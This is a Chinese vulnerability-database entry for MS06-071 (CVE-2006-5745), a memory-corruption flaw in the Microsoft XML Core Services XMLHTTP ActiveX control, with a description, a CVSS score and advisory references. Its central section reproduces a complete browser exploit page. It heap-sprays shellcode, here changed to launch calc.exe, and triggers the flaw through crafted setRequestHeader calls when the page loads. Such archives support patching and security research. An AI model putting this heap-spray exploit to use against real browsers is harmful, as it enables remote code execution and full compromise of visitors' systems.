Microsoft XML核心服务XMLHTTP控件内存破坏漏洞(MS06-071)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111493 漏洞类型 边界条件错误
发布时间 2006-11-08 更新时间 2007-05-15
CVE编号 CVE-2006-5745 CNNVD-ID CNNVD-200611-068
漏洞平台 Windows CVSS评分 7.6
|漏洞来源
https://www.exploit-db.com/exploits/2743
https://www.securityfocus.com/bid/20915
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-068
|漏洞详情
MicrosoftXML核心服务(MSXML)允许使用JScript、VBScript和MicrosoftVisualStudio6.0的用户构建可与其他符合XML1.0标准的应用程序相互操作的XML应用。在MicrosoftXMLCoreServices的XMLHTTP4.0ActiveX控件中,setRequestHeader()函数没有正确地处理HTTP请求,允许攻击者诱骗用户访问恶意的站点导致执行任意指令。攻击者可以通过构建特制网页来利用此漏洞,如果用户访问该网页或单击电子邮件中的链接,该漏洞就可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。不过,要利用此漏洞,需要进行用户交互。
|漏洞EXP
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit

Author: n/a

Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239

Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!)

Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called.

/str0ke
-->

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());    

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>

</body></html>

# milw0rm.com [2006-11-08]
|受影响的产品
Microsoft XML Core Services 6.0 Microsoft XML Core Services 4.0 HP Storage Management Appliance 2.1 + HP Storage Management Appliance III +
|参考资料

来源:VU#585137
名称:VU#585137
链接:http://www.kb.cert.org/vuls/id/585137
来源:TA06-318A
名称:TA06-318A
链接:http://www.us-cert.gov/cas/techalerts/TA06-318A.html
来源:XF
名称:ie-xml-http-request-handling(30004)
链接:http://xforce.iss.net/xforce/xfdb/30004
来源:MISC
链接:http://xforce.iss.net/xforce/alerts/id/239
来源:BID
名称:20915
链接:http://www.securityfocus.com/bid/20915
来源:MILW0RM
名称:2743
链接:http://www.milw0rm.com/exploits/2743
来源:www.microsoft.com
链接:http://www.microsoft.com/technet/security/advisory/927892.mspx
来源:ISS
名称:20061104VulnerabilityinMicrosoftXMLHTTPRequestHandling
链接:http://www.iss.net/threats/239.html
来源:VUPEN
名称:ADV-2006-4334
链接:http://www.frsirt.com/english/advisories/2006/4334
来源:SECTRACK
名称:1017157
链接:http://securitytracker.com/id?1017157
来源:SECUNIA
名称:22687
链接:http://secunia.com/advisories/22687
来源:MISC
链接:http://blogs.securiteam.com/?p=717
来源:MS
名称:MS06-071
链接:http://www.microsoft.com/technet/security/bulletin/ms06-071.mspx
来源:oval:org.mitre.oval:def:104
名称:oval:org.mitre.oval:def:104
链接: